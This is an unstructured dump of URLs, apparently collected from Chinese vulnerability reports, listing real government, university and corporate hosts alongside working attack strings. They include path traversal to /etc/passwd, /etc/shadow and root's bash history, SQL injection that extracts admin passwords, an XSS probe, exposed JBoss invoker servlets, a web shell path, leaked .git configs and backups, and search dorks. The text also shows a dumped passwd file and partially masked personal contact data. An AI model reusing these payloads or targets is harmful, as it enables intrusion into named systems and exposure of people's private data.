http://tsinghua.yun.lu/user/sendChgPwdEmail http://muc.yun.lu/user/sendChgPwdEmail http://bistu.yun.lu/user/sendChgPwdEmail http://whu.yun.lu/user/sendChgPwdEmail http://124.192.148.18 http://www.hrbcgs.gov.cn/detail.jsp?infoid= http://exam.186nfc.com/inc_upload.php http://www.jb51.net/article/28276.htm http://www.zhulang.com/forget/index.html http://www.zhulang.com/forget/newPwdPhone.html http://www.wodexiangce.cn inurl:TransactList.aspx?ItemName= inurl:onlineApply/ApplyGuide.aspx http://60.215.8.148:6006/onlineApply/ApplyGuide.aspx?infoFlowId=d9156d6a-b0c9-4870-9fae-ae34db6a33ab http://snsp.qingdao.gov.cn/onlineApply/ApplyGuide.aspx?infoFlowId=100207 http://ptfwzx.gov.cn/outportal/onlineApply/ApplyGuide.aspx?code=351100-10127-XK-001-01&version=1 http://shenpi.dongying.gov.cn/fabu/onlineApply/ApplyGuide.aspx?infoFlowId=af3d0ca1-3feb-43d0-b92d-4197706f3f2d http://www.bzxzspzx.gov.cn/onlineApply/ApplyGuide.aspx?infoFlowId=a3bc04dd-9554-4c0a-84b7-33d8b21ccf47 http://www.whaac.gov.cn:8080/onlineApply/ApplyGuide.aspx?infoFlowId=82eecb38-a253-4a7f-abf3-67a68a423120 http://www.rcsp.cn/onlineApply/ApplyGuide.aspx?infoFlowId=f156be2e-ee35-4dca-ae5d-170894ddc5b8 http://www.xc.zszwfw.gov.cn/zhoushan/ApplyGuide.aspx?infoflowId=02128 http://www.pts.zszwfw.gov.cn/zhoushan/ApplyGuide.aspx?infoflowId=01679 http://www.lgqzwfw.gov.cn/xspww/onlineApply/ApplyGuide.aspx?infoFlowId=d37fa1e0-116d-4773-922b-94c07a122ecc http://www.whctpasc.gov.cn/onlineApply/ApplyGuide.aspx?infoFlowId=eddd6345-c052-4984-88d6-b9b902f8795a http://www.whjqzwfwzx.gov.cn/wsbsdt/onlineApply/ApplyGuide.aspx?infoFlowId=25a42045-5864-4bfe-89b7-e2cdde53cfaf http://218.57.241.219/index.do http://itbangke.suning.com/web/ https://www.95598pay.com/rest/hxentcustomerinfo/findLoginPwd www.hktv.tv www.hktv.tv http://www.merchantstravel.com/tuan_list1.asp?dz=0&ntype=1&months=6&s=3&days=6 http://www.merchantstravel.com/admin/main.asp# www.hktv.tv http://campaign.hncb.com.tw/debt.asp?snop=9802190906 
http://www.iliangcang.com/i/usermain/fans/?id=504395684 site:iliangcang.com http://adm.iliangcang.com/ http://drops.wooyun.org/tips/2006 http://m.jiuxian.com/m_v1/user/login http://www.hrbegs.gov.cn/admin/login.php http://hi.haidilao.com/pages/haidl/alter_password_phone.jsp http://www.iliangcang.com/i/usermain/?id=1259 http://www.iliangcang.com/i/usermain/favour/?id= http://www.iliangcang.com/i/usermain/my/?id=504395684 http://www.iliangcang.com/i/usermain/feed/?id=504395684 http://www.iliangcang.com/i/usermain/follow/?id=504395684 http://www.iliangcang.com/i/message/msg_detail/?id=999998832 http://**.**.**/ULogin.aspx http://app.scjst.gov.cn/MCreditSC/personsys/jzsgoon/JZS/PrintPersonList.aspx?classId=2916 http://app.scjst.gov.cn/MCreditSC/personsys/jzsgoon/JZS/PrintPersonList.aspx?classId=2918 www.landandan.com ResumeUploading.aspx/GetEmpIdByKeyWords http://zhibo.yushu.gov.cn:8082/css/meeting/base/Com_OpenBroadcast.do?crmId=266 http://**.**.**/ http://www.ztehn.com/ http://dev.10086.cn/ http://dev.10086.cn/oms/appcombine/PubAppAction.action?method=appProfile&appId=300009009716 http://bbs.m.my089.com/m/detail?mid=13122923-5309-5649-0009-270375689169&fsid=8b6c6f0b-f3d8-11e4-9a9d-ecf4bbd35074 http://bbs.my089.com/topic/list?mid=13122923-5309-5649-0009-270375689169&ise=1 http://partner.life.qq.com/card/list?page=237&totalItems=4893 http://partner.life.qq.com/card/show?cardid=1636669606 http://partner.life.qq.com/menu/view?cardid=1151360746 http://www.hbzfhcxjst.gov.cn/UpFiles/Attach/2013/12/19/1708066163.pdf http://www.smart-city.org.cn/ http://www.wanxinsoft.com/ http://210.43.24.201:8080/model/TwoGradePage/res.aspx?id=44814 http://210.27.176.162/model/TwoGradePage/res.aspx?id=44814 http://202.114.33.72/model/TwoGradePage/res.aspx?id=44814 http://yqgx.zstu.edu.cn/model/TwoGradePage/res.aspx?id=44814 http://dxsb.qfnu.edu.cn/model/TwoGradePage/res.aspx?id=44814 http://180.169.5.231/ http://180.169.5.231/invoker/JMXInvokerServlet http://180.169.5.231/wooyun/woo.jsp 
http://puser.zjzwfw.gov.cn/sso/usp.do?action=ssoLogin&servicecode=njdh http://61.141.236.33:8080/index.php?c=schoolRecruitment&f=employNewsOpen&id=2 http://61.141.236.33:8080/index.php?c=schoolRecruitment&f=preach&cityid=82 http://61.141.236.33:8080/index.php?c=schoolRecruitment&f=jobPosition&cate=all http://snms.deppon.com:8080/itms/index.login.action http://180.153.16.29:8080/itms/index.login.action acs.ear/itms.war/ http://180.153.16.29:8080/itms/index.login.action acs.ear/itms.war/ http://newadmin.newman.mobi http://58.53.209.98/ http://bi.xinhehui.com/Public/Public/document?handle=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://bi.xinhehui.com/Public/Public/document?handle=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhosts http://www.rz12333.gov.cn/rz12333/e/tool/bysda/index.php http://new.51cto.com/php/viewart.php?ID=10013.htm http://ly.tdtchina.cn/webchat/login.action如图所示: http://jiance.sdta.com:8080/webunion/webframe/Login.action?request_locale=zh http://221.229.34.152/Login.aspx http://180.153.19.34/omc/login.jsp?error=true http://180.153.19.34/jmx-console/需要认证 http://www.dtspaq.gov.cn http://www.nongyou.com.cn/ http://221.2.156.181:8100/jubao/jbshouli.aspx?id=1 http://222.135.109.70:8100/jubao/jbshouli.aspx?id=1 http://61.133.119.187:8089/jubao/jbshouli.aspx?id=1 http://60.217.72.17:8000/jubao/jbshouli.aspx?id=1 http://222.135.127.190:7000/jubao/jbshouli.aspx?id=1 http://www.whfdc.gov.cn/newhouse/spf/detail-gs-ld-xx.php?houseno=49571&prjid=-12221 http://www.whfdc.gov.cn/newhouse/spf/detail-gs-ld-xx.php?houseno=49571&prjid=-12221 https://school.chb.com.tw/PaymentForm/PaymentForm.aspx?SCHOOLNO=1023&STUID=998L0020 http://ofund.emega.com.tw/prod/latest_value.asp?fdcid=D i.56.com/u/adminlogin/album/这是一个用户首页,然后再点击右上角的登陆就可以了,然后看到是没有验证码限制的 http://111.4.115.169:8839/secure/login http://rst.aoratec.com:8088/istnew_v4.4/system/doLogin.do http://rst.aoratec.com:8088/istnew_v4.4/system/doLogin.do http://124.133.54.13:81/g2/ 
http://top.52pk.com/index.php?c=../../../../../../../../../../proc/self/environ%00.txt&color_1=&line=10&m=add&p=xin_ts&title=e&width=260 http://top.52pk.com/index.php?c=../../../../../../../../../../proc/self/loginuid%00.txt&color_1=&line=10&m=add&p=xin_ts&title=e&width=260 http://info.nenu.edu.cn/newsdetail02.php?id=10892等页面存在SQL注入,可拿到passwd、httpd.conf和config.inc.php等文件,能分析出操作系统用户和数据库账户及口令。 http://www.bajiebao.com/sysMsg/getMessage http://www.megaholdings.com.tw/contents/news/show_news.asp?SN=108 http://www.megaamc.com.tw/content/search/search01.asp?CityCode=260 http://taian.21tb.com/ http://www.goldlib.com.cn/ http://210.26.83.207:8001/opac/opacOpenurl/getOpenUrlByBookId/1 http://113.247.235.133:8081/opac/opacOpenurl/getOpenUrlByBookId/1 http://211.84.163.240:8080/opac/opacOpenurl/getOpenUrlByBookId/1 http://library.cnuschool.org.cn:8080/opac/opacOpenurl/getOpenUrlByBookId/1 http://114.242.187.29:8080/opac/opacOpenurl/getOpenUrlByBookId/1 http://i.sqgame.net/VIP/ZFBBuyVip.aspx?id=3 http://qiandan.jiaji.com/SignScan/login.action http://222.171.148.161/UMC/Login.action http://222.75.152.197:8080/UMC/Login.action http://222.47.70.3:8080/UMC/Login.action http://218.28.177.149/UMC/Login.action http://211.138.102.195:8080/UMC/Login.action http://222.171.148.161 http://weixin.family.baidu.com/index.php/site/login http://weixin.family.baidu.com/index.php/site/user_t?id=1%27%20union%20select%201,2,version%28%29,4%20--%20 http://epwf.tclcom.com/ashx/GetRequestorJosnHandler.ashx可以查询出员工的详细信息。 http://es.cslc.com.cn/Ajax/Contract/GetContractLXbyLB.asp?ContractLB=1 inurl:contentmanager.do?method=view http://60.247.10.155:8001/cms/login.html http://www.iliangcang.com/i/myorder?act=orderListPay&page_size=10&page=0&keyword=1 http://**.**.**/ http://218.76.25.212:9010/OrderAir/Details/76853?ref=%2FOrderAir%2FAudit%2F http://211.137.36.122/ http://119.167.225.28:81/shengbang/list.php?type=A 
https://www.baidu.com/s?wd=intitle%3A%E8%AE%A2%E5%8D%95%E8%AF%A6%E6%83%85&pn=20&oq=intitle%3A%E8%AE%A2%E5%8D%95%E8%AF%A6%E6%83%85&ie=utf-8&usm=1&rsv_idx=1&rsv_pq=972152cc00026cdc&rsv_t=07eajB6TlNb1FYCSrLQX3Z%2FOKjRctLem7dG3DrS7uDfco6FVUoHp0X%2BEeFU http://order.ny.cn/storeOrderDetail.htm?orderNo=15030801994800 http://www.laiyihuo.com/PersonCenter/HistoryDetail/03433ee6-0336-415d-8323-237a0af9e5a3 http://hi.189.cn/shop/orderSearch/orderDetail.shtml?orderCondition.webOrder=645F0D43B5DC4B62736FBADB978C2B48556477A7A235299A&channelCode=10&actionType=GR_ZX http://map.baidu.com/detail?qt=movie&act=detailpc&id=14102144&sign=a8aa9921ae7d10f33dc6698df744d653609d3b96&tab=1&from=pc&is_c_order=0 https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&rsv_idx=1&tn=baidu&wd=inurl%3Ainsurance%2Forder%2Fdetailreadonly&rsv_pq=860930e00000bf00&rsv_t=b288Uvz9ztEcwTYkgdiisOYm1VRlFB6ayS%2F3g4SHh6kdE07doGcjezvpyvk&rsv_enter=1&inputT=1291&rsv_sug3=15&rsv_sug1=6&rsv_n=2&bs=inurl%3B http://wx.xgimi.com/admin.php https://github.com/truecn/websdk/blob/917ced5828c1dccc8298b1288f7ba66595ef33c6/src/META-INF/config.properties http://www.hnedu.cn/tg/System/usermanager.jsp http://uporder.yonyou.com/file/ http://ns.35.com/wp-login.php http://**.**.**/index.php http://202.123.110.44/login.action http://airport.csair.com/SelfMonitoring/CussMain.do?method=selectData&city=ALL www.jinhaidai.com http://ir.anta.com/ http://www.mogujie.com/registermg/updatepassword http://hlm.53kf.com http://hunjia.55bbs.com/files/activity/vote.php?album_id=79&t=3 https://igop.cmgame.com:7443/cas/login http://igop.cmgame.com:38086/pop/content/createImage2page.action?localPath=/upload/20150515/131558/40947/icon/1431666936394.jpg http://igop.cmgame.com:38086/pop/content/modifyGameMyWork.action?contentInfo.contentId=40947&contentInfo.gameType=1 http://www.hbychrss.gov.cn/module/jslib/jquery/jpage/morecolumndataproxy.jsp?endrecord=9&perpage=3&startrecord=1 http://**.**.**/zentao/ 
http://**.**.**/zentao/upgrade.phpm=editor&f=edit&filePath=RzpceGFtcHBcemVudGFvXGNvbmZpZ1xteS5waHA=&action=edit https://www.jinhaidai.com/integral/conversion www.jinhaidai.com www.jinhaidai.com http://www.oldai.cn//apk/file:///etc/passwd http://wzbtv.com/sfrx/ http://www.nxky.cn/tsxt/ http://www.myesms.net/zf/ http://60.211.253.196:81/jwxx/ http://www.wzgxzx.com/xzxx/ http://yt.linekong.com/newer_main.php?article_id=4540 http://yt.linekong.com/special/v1.1/content.php?id=9269 http://oa.seari.com.cn/wui/theme/ecology7/page/login.jsp?templateId=141&logintype=1&gopage=&message=55 http://oa.seari.com.cn:8011/hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001A11000000000G9WA& http://www.seari.com.cn/index.php?a=hits%27%22%28%29%26%25%3Caaa%3E%3CScRiPt%20%3Eprompt%28/x/%29%3C/ScRiPt%3E&id=798&m=News ttp://www.seari.com.cn/phpinfo.php http://www.seari.com.cn/en/admin/ http://www.seari.com.cn/core/conf/ http://www.seari.com.cn/uploads/ http://60.216.104.27:81/ www.wgyp.com http://61.161.98.234/raiders/search.php?dest_id=333%27 http://61.161.98.234/admin/index.php http://sme.nju.edu.cn/content/news_detail.php?id=89 http://sme.nju.edu.cn/content/admin/sem_user/admin_php/Login.php http://www.esikao.net/page.php?id=56 http://www.inspur.com/ http://117.40.187.175:8008/outportal/bulletin/Businessview.jsp?businessid=8080812a897481012a9761f71e0618 http://218.65.59.94/outportal/bulletin/Businessview.jsp?businessid=018ae42b585524012b5983103e01a5 http://117.40.180.140:8008/outportal/bulletin/Businessview.jsp?businessid=f08ab83fbc3b3e0145ae47dd6f146e http://117.40.186.185:8008/outportal/bulletin/Businessview.jsp?businessid=8080812a9e1b06012aa196274a0086 http://218.65.5.117:8008/outportal/bulletin/Businessview.jsp?businessid=8080812a6e176e012a6edfff7e02ce http://124.117.246.20:81/yz/xxbm/gagdgx.asp www.multigold.com.cn/goodsDetail/getRushByStatus?callback=jQuery171020818918524309993_1432000259692 
www.multigold.com.cn/goodsDetail/getRushByStatus?callback=jQuery171020818918524309993_1432000259692 http://jxk.sdust.edu.cn/show.asp?nrID=377 http://wooyun.org/bugs/wooyun-2010-069003 http://www.qzdatasoft.com/ http://www.qzdatasoft.com/cgal.html http://113.135.195.58/jiaowu_ylxy/hlp/help.asp?HlpCode=1 http://61.183.19.35/hlp/help.asp?HlpCode=1 http://221.212.251.229/jiaowu2008/hlp/help.asp?HlpCode=1 http://221.238.158.84/jw//hlp/help.asp?HlpCode=1 http://221.232.159.24/dhjw//hlp/help.asp?HlpCode=1 http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/licenseManage.jsp http://117.40.187.175:8008/outportal/licenseManage/licenseManage.jsp http://xzfw.jinxi.gov.cn/outportal/licenseManage/licenseManage.jsp http://xzfw.jxcr.gov.cn/outportal/licenseManage/licenseManage.jsp http://120.203.196.20/outportal/licenseManage/licenseManage.jsp encoding:utf-8 http://bbs.emoney.cn/config/config_ucenter.php.bak http://bjey.org/ http://bjey.org/admin http://218.108.28.59/Home/LogOn rsync://58.68.237.116/ rsync://58.68.237.116/bak rsync://58.68.237.116/daydate http://my.zto.cn http://my.zto.cn/AddressManage/Index/ http://nju.fitoo.com/Match/jiangsu/apply.aspx随意注册一个账号(邮箱验证),信息随便填写,那就用强大的163邮箱呗。 www.yixuebaike.cn)框架为Joomla,安装的HD http://211.71.232.61:81/default.aspx http://bcm.open.com.cn/Va_username.aspx?username= http://ccaa.open.com.cn/logon.aspx http://www.daimayi.com/index.php/About/index/cate_id/* http://www.zzlyj.gov.cn/gginfo.asp?id=7630 http://ecs.taikang.com http://bqxin.cn/bf/saleslogin.aspx http://112.80.248.138:8080/ http://112.80.248.138:8080/phpmyadmin结果还可以。 www.telecom10000.com/ http://www.telecom10000.com/new_1.asp?id=17 site:sina.com.cn inurl:club http://club.baby.sina.com.cn/api/api.php?s=suggest&a=user&q=1 http://club.mil.news.sina.com.cn/api/api.php?s=suggest&a=user&q=1 http://club.eladies.sina.com.cn/api/api.php?s=suggest&a=user&q=1 http://club.news.sina.com.cn/api/api.php?s=suggest&a=user&q=1 http://club.ent.sina.com.cn/api/api.php?s=suggest&a=user&q=1 
http://club.astro.sina.com.cn/api/api.php?s=suggest&a=user&q=1 http://old.gzfcj.gov.cn/wyzt/viewnews.aspx?id=62 https://github.com/caoguangyao/wasu_rmss/blob/master/RMSS%E7%9B%B8%E5%85%B3%E8%B5%84%E6%96%99.txt http://218.108.255.183/UserLogin/Login.aspx http://125.210.208.56/hsyw/Login.aspx http://125.210.208.56/hsywnew/Login.aspx http://www.daimayi.com/index.php/Ask/detail/id/13 index.php/Ask/detail/id/13 www.daimayi.com http://service.vmovier.com/.git/config http://www.vmovier.com/.git/config http://magicapi.vmovier.com/.git/config http://www.test.vmovier.com/.git/config http://222.240.156.74/login.php http://222.240.156.74/phpmyadmin/ http://222.240.156.74/phpmyadmin/libraries/config/user_preferences.forms.php http://yewu.tuhu.cn/Account/LogOn http://218.25.120.69:81/passport/login.mspx http://skch.nju.edu.cn/showliterary.php?id=65 http://223.4.57.81:80//.git/config https://github.com/zanbai/web.git http://www.datonglr.gov.cn/news/NewsListTitle.aspx?Title=1 http://app3.rthk.org.hk/press/main.php?id=3 http://www.sn-cnpc.com/organ/detail.asp?id=1 http://www.sn-cnpc.com/admin/login.asp http://www.sn-cnpc.com:80/admin/../admin.rar http://www.sn-cnpc.com:80/cnpcoa/login.asp https://vpn.lppz.com http://192.168.32.145:8080存在Jboss的JMXInvokerServlet漏洞 url:http://forever21.cn/Product/NewArrivals.aspx?Category=21men_app&PageSize=40&MoreColor=¶msize=%25%27%20AND%202471%3d2471%20AnD%20%27%25%27%3d%27¶mprice=&CurrentPage=1¶morder= http://1 http://tj17996.com http://tj17996.com/invoker/JMXInvokerServlet admin:service=DeploymentFileRepository http://tj17996.com/myname/index.jsp http://tj17996.com/myname/bak.jsp http://pz.99.com http://pay.fjca.com.cn/epay_server/viewPayInfoByOrdId.jsp?ordId=2015066020006488 http://pay.fjca.com.cn/epay_server/viewPayInfoByOrdId.jsp?ordId=2015066020006490 http://boss.iqianjin.com/ http://boss.iqianjin.com:80/index.jsp http://lwjs.91wan.com/huodong/bizhi/download.php?f=../../../huodong/bizhi/download.php http://www.showjoy.com/sku/9812.html 
http://cpms.ccgp.gov.cn/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=%2FFCKeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fjsp%2Fconnector.jsp http://uc.mojichina.com/findpwd/byphone# http://uc.mojichina.com/findpwd/byphone# http://uc.mojichina.com/findpwd/verifysms http://uc.mojichina.com/findpwd/resetpwdbyphone# https://118 http://kenting.caesarpark.com.tw/news.php?No=642&NewsType=3&test1=63&test2=235&test3=63 http://gui.sanguosha.com/page.php http://smsold.tdxinfo.com/ http://smsold.tdxinfo.com/bycinnersys/images/ http://smsold.tdxinfo.com/bycinnersys/UpLoadFile/ http://smsold.tdxinfo.com/bycinnersys/logs/ http://smsold.tdxinfo.com/bycinnersys/web.zip http://cms.300.cn/invoker/JMXInvokerServlet http://if.xinjunshi.com/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat%280x3C6162633E,group_concat%280x7C,userid,0x3a,pwd,0x7C%29,0x3C2F6162633E%29,5,6,7,8,9%20from%20%60%23@__admin%60%23%22 http://en.anta.com/anta.zip http://career.shenhuagroup.com.cn/cwgs20150506/ http://career.shenhuagroup.com.cn/cwgs20150506/UpLoad/ASPXspy2.aspx http://123.157.10.19:8080/factory_index.action www.ele.to http://wenku.baidu.com/view/bf29bff301f69e31433294b5.html http://chinese.cnu.edu.cn/index.php http://219.142.121.212/ http://www.17500.cn:80/tc225/survey_showR.php?issue=09125 http://tripcome.com:8080/b2b/index.jsp http://nsp.lashou.com/Home/Login/index http://183.224.40.116/Default.aspx http://183.224.40.116/WebResource.axd?d=8W7nSsLrHIqKwpHT3roW http://www.bio.gxnu.edu.cn/index.php/Article/index/id/1161 http://www.ci.gxnu.edu.cn/index.php/article/index/id/2688 inurl:contentmanager.do?method=view http://www.cnstedu.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp http://kxsz.gdec.net/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp 
http://www.cimuset.org/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp http://www.fdstmc.org.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp http://www.chinaworldmall.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp http://www.sqkpym.org.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp www.cnstedu.cn http://jpkc.nwpunec.net:8002/jingpin/course/huaxue!list.action www.thankyou99.com/ http://api.thankyou99.com/4006168169/cai/shlists.php?id=1 http://www.thankyou99.com/Admincenter/Index http://www.thankyou99.com/Admincenter/Index http://api.thankyou99.com/4006168169/houtai http://wenku.baidu.com/view/add59c06b9d528ea80c77925.html http://111.113.2.206:8003/ https://www.dayspay.com.cn/download.jsp?file=../../../../../../../../../../../../etc/passwd http://mts.uutest.cn/net http://www.gdjyjt.gov.cn/index.asp?zc=13&ch=2&fid4=1 http://**.**.**.**/public/download.jsp?file=../../../../../../../../../../etc/passwd http://www.tsjt.gov.cn/info_Show.asp?InfoId=1180&ClassId=64&Topid=0 index.php/ceo8/score_search http://v.17173.com/u/55339368/playlist/favorites/?keywords=*&order=time http://oa.travelzen.com/Users/Membership/LogOn http://nms.city.sina.com.cn/index.php?m=Template&a=preview&report_id=3713 http://www.inspur.com/ intitle:ECGAP http://xzfw.yunyang.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://118.182.148.163:8001/zwdt/Channel/ChannelList.aspx?a=a&LicenseType=1 http://wbxt.lw.gov.cn/sp/Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.dh.zszwfw.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.ss.zszwfw.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.lssp.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.dfxzfw.cn/LangChao.ECGAP.OutPortal/Channel/ChannelList.jsp?a=a&LicenseType=1 http://www.jnzwzx.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 
http://www.zbxzfwzx.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://118.182.148.163:8001/zwdt//Channel/ChannelList.aspx?a=a&LicenseType=1 http://124.128.196.195/waiwang//Channel/ChannelList.aspx?a=a&LicenseType=1 http://221.214.108.172/waiwang/Channel/ChannelList.aspx?a=a&LicenseType=1 http://61.178.249.69/spww/Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.mudanxzfw.cn//Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.rsjjjc.gov.cn//Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.mudanxzfw.cn//Channel/ChannelList.aspx?a=a&LicenseType=1 http://61.154.13.90/Channel/ChannelList.aspx?a=a&LicenseType=1 http://wbdt.gdqts.gov.cn/LangChao.ECGAP.OutPortal/Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.nbjdzw.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://218.56.40.228/ZhiFuQuShenPi/Channel/ChannelList.aspx?a=a&LicenseType=1 http://221.206.154.215:81/langchao.ecgap.outportal/Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.fjxzsp.com/LangChao.ECGAP.OutPortal/Channel/ChannelList.aspx?a=a&LicenseType=1 http://shenpi.xuchang.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.hyzwfw.com/Channel/ChannelList.aspx?a=a&LicenseType=1 http://shenpi.haishu.gov.cn/LangChao.ECGAP.OutPortal/Channel/ChannelList.aspx?a=a&LicenseType=1 http://wssp.taijiang.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://shenpi.xcxian.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.rsjjjc.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://61.154.13.90//Channel/ChannelList.aspx?a=a&LicenseType=1 http://shenpi.xiangxian.gov.cn//Channel/ChannelList.aspx?a=a&LicenseType=1 http://m.thepaper.cn/ http://roll.hexun.com:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://roll.hexun.com:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://www.352.com/member/info/modify_address.do?id=XXXX http://www.352.com/member/info/modify_address.do?id=XXXX 
http://www.wooyun.org/bugs/wooyun-2010-0115388/trace/c415f911f515dee9836cefdab9ca01a3 http://rong.36kr.com/api/v1/ios-user/-ID-/profile http://rong.36kr.com/api/v1/ios-user/711/profile http://krplus-pic.b0.upaiyun.com/201503/23195614/7be9e2cc259d7834.jpg","email":"laputan马赛克@fotoplace.cc","enterpriser":1,"id":711,"investorType":100,"isDisplayWeixin":false,"name":"杨柳","nickAvatar":"http://wx.qlogo.cn/mmopen/ajNVdqHZLLAl21jrHaCHQzgF1DrAsBDIJ1RJ3Hvvr8PCfmCQIkfbBHKoItkKTgDBV4SDZSFgiaoZUs4sdR7udXQ/0","nickName":"杨柳(足记fotoplace)","phone":"13918331马赛克"}},"msg":"操作成功! http://rong.36kr.com/api/v1/ios-user/28633/profile http://krplus-pic.b0.upaiyun.com/c00dd2691e0937663493df104fb18976","email":"马赛克u@hearst.com","enterpriser":0,"id":28633,"intro":"赫斯特资本中国投资主管","investorType":20,"isDisplayWeixin":false,"linkedin":"","name":"胡盈青","nickName":"1350199马赛克","phone":"1350199马赛克","weibo http://ggzx.stock.hexun.com/port/focus_industry_getone.jsp?t=2&c=10&s=2&tag=focus_hyzx&callback=callback&noCacheIE=1432033218504&k=0570 http://www.homeinns.com/homeinn,自己先注册一个账号,后面要用; http://17500.cn/tc225/survey_showR.php?issue=07087 http://www.jincai.sh.cn/BasePlate/DataCenter/OnlineBrowse.aspx http://www.shjzzx.com/BasePlate/DataCenter/OnlineBrowse.aspx http://www.etzx.edu.sh.cn/BasePlate/DataCenter/OnlineBrowse.aspx http://www.mhjjy.com/BasePlate/DataCenter/OnlineBrowse.aspx http://ljxx.mhedu.sh.cn/BasePlate/DataCenter/OnlineBrowse.aspx http://tzjt.sjtu.edu.cn/BasePlate/DataCenter/OnlineBrowse.aspx http://www.jcsy.pudong-edu.sh.cn/BasePlate/DataCenter/OnlineBrowse.aspx http://photo.qpedu.cn/BasePlate/DataCenter/OnlineBrowse.aspx http://www.mszb.pte.sh.cn/BasePlate/DataCenter/OnlineBrowse.aspx http://www.mszb.pte.sh.cn/BasePlate/DataCenter/OnlineBrowse.aspx http://www.mszb.pte.sh.cn/wooyun.aspx http://222.249.250.110:8081/ http://222.249.250.110:8089/ http://222.249.250.110:8090/ http://ccaa.open.com.cn/ExamSite/index.aspx http://en.anta.com/ http://en.anta.com/products.php?keyword=1 
http://rd.dawenmedia.com http://rd.dawenmedia.com/editor/attached/image/20150522/20150522172414_21197.jpg/.php https://github.com/lewis-bo/niulanshan/blob/5b06fc102582e25ca0b16df0b0a6d0753c71cc3d/site/WebContent/WEB-INF/classes/email.properties www.guh-software.de http://www.sysp.gov.cn/webservice2.asmx,暴漏大量的webservice接口,可以查询、插入、更新数据。而且,接口没有认证。如下图所示: http://www.sysp.gov.cn/webservice2.asmx http://tempuri.org/SQLSelect www.sysp.gov.cn http://www.xiangyahui.com/ask?schoolid=1 http://XXX/discuz/utility/convert/index.php?a=config&source=d7.2_x2.0 http://sms.9air.com/fileManagement.action?fileName=2014%E5%B9%B411%E6%9C%8828%E6%97%A5%E5%AE%89%E5%85%A8%E5%AE%A3%E8%AE%B2%E6%95%99%E8%82%B2%E5%9F%B9%E8%AE%AD%E6%9D%90%E6%96%99.rar&fileAddr=/WEB-INF/fileManagementupload/14177648884410.rar http://sms.9air.com/fileManagement.action?fileName=2014%E5%B9%B411%E6%9C%8828%E6%97%A5%E5%AE%89%E5%85%A8%E5%AE%A3%E8%AE%B2%E6%95%99%E8%82%B2%E5%9F%B9%E8%AE%AD%E6%9D%90%E6%96%99.rar&fileAddr=/WEB-INF/fileManagementupload/../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin 
